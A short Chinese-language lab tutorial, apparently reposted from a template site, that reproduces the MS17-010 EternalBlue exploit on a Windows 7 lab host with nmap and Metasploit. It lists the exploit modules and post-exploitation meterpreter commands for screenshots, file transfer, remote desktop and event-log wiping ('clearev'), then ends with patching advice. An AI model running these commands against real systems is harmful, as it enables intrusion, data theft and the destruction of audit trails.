Eternal blue永恒之蓝漏洞
windows操作系统漏洞
借助工具Metasploit复现漏洞
利用条件:
1.目标计算机开启445端口
2.一般适用计算机系统 windows7 或windows server2008 R2
攻击机器:kali-Linux 192.168.109.130
目标靶机:windows7 192.168.109.129
1.在黑客机器中对目标计算机进行端口的扫描 发现目标445端口处于开放状态
nmap -p 80,3389,3306,445,8080 192.168.109.129
也可以考虑使用namp自带的script功能直接去扫描漏洞
nmap --script=vuln 192.168.109.129
发现同样可以利用ms17010永恒之蓝漏洞
接下来在kali端进行操作:
msfconsole
search ms17-010
接下来首先使用的是永恒之蓝扫描模块
use auxiliary/scanner/smb/smb_ms17_010
show options
set RHOSTS 192.168.109.129
exploit
接下来使用永恒之蓝攻击模块
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.109.129
exploit
msf有一些后渗透模块可以使用
捕获屏幕
meterpreter > screenshot
上传/下载文件
meterpreter > upload hello.txt c://
meterpreter > download d://1.txt
远程桌面
meterpreter > run vnc
使用rdesktop命令远程桌面
root@kali:~# rdesktop 192.168.2.6
清除日志
meterpreter > clearev
修复方案:
1.关闭445端口
2.打开防火墙 安装安全软件文章来源:https://www.toymoban.com/news/detail-484868.html
3.安装相应的补丁文章来源地址https://www.toymoban.com/news/detail-484868.html
到了这里,关于MS17-010 永恒之蓝漏洞利用方式的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!